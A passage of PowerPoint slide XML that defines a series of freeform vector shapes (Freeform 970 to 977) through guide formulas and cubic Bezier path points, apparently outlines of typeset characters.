                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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9" name="Freeform 970">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1714C3BF-573E-43EC-9DDC-420DA1C6CBF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId146"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5602288" y="2349501"/>
              <a:ext cx="68263" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 178 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 112 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 34 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 115 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 145 w 196"/>
                <a:gd name="T13" fmla="*/ 35 h 222"/>
                <a:gd name="T14" fmla="*/ 167 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 115 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 109 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="181" y="151"/>
                    <a:pt x="178" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="151"/>
                    <a:pt x="165" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="149" y="192"/>
                    <a:pt x="112" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="192"/>
                    <a:pt x="34" y="157"/>
                    <a:pt x="34" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="88"/>
                    <a:pt x="48" y="30"/>
                    <a:pt x="115" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="30"/>
                    <a:pt x="145" y="30"/>
                    <a:pt x="145" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="155" y="59"/>
                    <a:pt x="167" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="59"/>
                    <a:pt x="190" y="51"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="115" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="68"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="109" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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30" name="Freeform 971">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED273D9A-722D-464C-8AD5-A35E069A1BD0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId147"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5689601" y="2349501"/>
              <a:ext cx="71438" cy="77788"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="108" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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31" name="Freeform 972">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DA5DF6-2BE1-4EB0-BC96-7807688075A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId148"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5792788" y="2317751"/>
              <a:ext cx="46038" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 46 w 136"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 136"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 2 w 136"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 136"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 136"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 40 w 136"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 46 w 136"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 136"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 136"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 90 w 136"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 136"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 136"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 128 w 136"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 136"/>
                <a:gd name="T27" fmla="*/ 2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47">
                  <a:moveTo>
                    <a:pt x="46" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="4"/>
                    <a:pt x="31" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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32" name="Freeform 973">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4872C910-85F0-4C0E-AC63-96360909C376}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId149"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5892801" y="2405063"/>
              <a:ext cx="28575" cy="46038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 82"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 82"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 82"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 82"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 82 w 82"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 41 w 82"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 82"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 82"/>
                <a:gd name="T15" fmla="*/ 62 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 82"/>
                <a:gd name="T17" fmla="*/ 6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132">
                  <a:moveTo>
                    <a:pt x="51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="103"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="123"/>
                    <a:pt x="7" y="132"/>
                    <a:pt x="16" y="132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="132"/>
                    <a:pt x="82" y="105"/>
                    <a:pt x="82" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="19"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="41" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="10" y="15"/>
                    <a:pt x="10" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="50"/>
                    <a:pt x="24" y="62"/>
                    <a:pt x="41" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="62"/>
                    <a:pt x="47" y="62"/>
                    <a:pt x="51" y="6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33" name="Freeform 974">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71495F3-1FD7-4CA4-983F-E18D50A595D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId150"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5986463" y="2405063"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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34" name="Freeform 975">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4BA599F-8BE9-4BBC-A9EC-2C7D0CE5DF19}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId151"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6076951" y="2405063"/>
              <a:ext cx="20638" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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35" name="Freeform 976">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6B61BF-E5BF-4716-AFB6-56A524FE1A17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId152"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6165851" y="2405063"/>
              <a:ext cx="22225" cy="22225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 31 h 62"/>
                <a:gd name="T2" fmla="*/ 32 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 62"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 62"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 62 h 62"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 31 h 62"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="62" h="62">
                  <a:moveTo>
                    <a:pt x="62" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="48" y="0"/>
                    <a:pt x="32" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="15"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="15" y="62"/>
                    <a:pt x="31" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="62"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62"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36" name="Freeform 977">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F48C2C55-8F8B-4BC2-8982-00799ECCAE90}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId153"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6235701" y="2295526"/>
              <a:ext cx="60325" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 177"/>
                <a:gd name="T1" fmla="*/ 433 h 499"/>
                <a:gd name="T2" fmla="*/ 4 w 177"/>
                <a:gd name="T3" fmla="*/ 488 h 499"/>
                <a:gd name="T4" fmla="*/ 0 w 177"/>
                <a:gd name="T5" fmla="*/ 493 h 499"/>
                <a:gd name="T6" fmla="*/ 10 w 177"/>
                <a:gd name="T7" fmla="*/ 499 h 499"/>
                <a:gd name="T8" fmla="*/ 105 w 177"/>
                <a:gd name="T9" fmla="*/ 437 h 499"/>
                <a:gd name="T10" fmla="*/ 105 w 177"/>
                <a:gd name="T11" fmla="*/ 323 h 499"/>
                <a:gd name="T12" fmla="*/ 125 w 177"/>
                <a:gd name="T13" fmla="*/ 271 h 499"/>
                <a:gd name="T14" fmla="*/ 172 w 177"/>
                <a:gd name="T15" fmla="*/ 255 h 499"/>
                <a:gd name="T16" fmla="*/ 177 w 177"/>
                <a:gd name="T17" fmla="*/ 250 h 499"/>
                <a:gd name="T18" fmla="*/ 169 w 177"/>
                <a:gd name="T19" fmla="*/ 244 h 499"/>
                <a:gd name="T20" fmla="*/ 107 w 177"/>
                <a:gd name="T21" fmla="*/ 200 h 499"/>
                <a:gd name="T22" fmla="*/ 105 w 177"/>
                <a:gd name="T23" fmla="*/ 175 h 499"/>
                <a:gd name="T24" fmla="*/ 105 w 177"/>
                <a:gd name="T25" fmla="*/ 77 h 499"/>
                <a:gd name="T26" fmla="*/ 81 w 177"/>
                <a:gd name="T27" fmla="*/ 21 h 499"/>
                <a:gd name="T28" fmla="*/ 10 w 177"/>
                <a:gd name="T29" fmla="*/ 0 h 499"/>
                <a:gd name="T30" fmla="*/ 0 w 177"/>
                <a:gd name="T31" fmla="*/ 6 h 499"/>
                <a:gd name="T32" fmla="*/ 8 w 177"/>
                <a:gd name="T33" fmla="*/ 11 h 499"/>
                <a:gd name="T34" fmla="*/ 70 w 177"/>
                <a:gd name="T35" fmla="*/ 55 h 499"/>
                <a:gd name="T36" fmla="*/ 72 w 177"/>
                <a:gd name="T37" fmla="*/ 78 h 499"/>
                <a:gd name="T38" fmla="*/ 72 w 177"/>
                <a:gd name="T39" fmla="*/ 183 h 499"/>
                <a:gd name="T40" fmla="*/ 92 w 177"/>
                <a:gd name="T41" fmla="*/ 230 h 499"/>
                <a:gd name="T42" fmla="*/ 130 w 177"/>
                <a:gd name="T43" fmla="*/ 250 h 499"/>
                <a:gd name="T44" fmla="*/ 72 w 177"/>
                <a:gd name="T45" fmla="*/ 313 h 499"/>
                <a:gd name="T46" fmla="*/ 72 w 177"/>
                <a:gd name="T47" fmla="*/ 43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7" h="499">
                  <a:moveTo>
                    <a:pt x="72" y="433"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="452"/>
                    <a:pt x="59" y="484"/>
                    <a:pt x="4" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="488"/>
                    <a:pt x="0" y="490"/>
                    <a:pt x="0" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="499"/>
                    <a:pt x="5" y="499"/>
                    <a:pt x="10" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="499"/>
                    <a:pt x="105" y="474"/>
                    <a:pt x="105" y="437"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="323"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="303"/>
                    <a:pt x="105" y="287"/>
                    <a:pt x="125" y="271"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="257"/>
                    <a:pt x="161" y="256"/>
                    <a:pt x="172" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="255"/>
                    <a:pt x="177" y="253"/>
                    <a:pt x="177" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="245"/>
                    <a:pt x="174" y="245"/>
                    <a:pt x="169" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="242"/>
                    <a:pt x="112" y="224"/>
                    <a:pt x="107" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="194"/>
                    <a:pt x="105" y="193"/>
                    <a:pt x="105" y="175"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="56"/>
                    <a:pt x="105" y="40"/>
                    <a:pt x="81" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
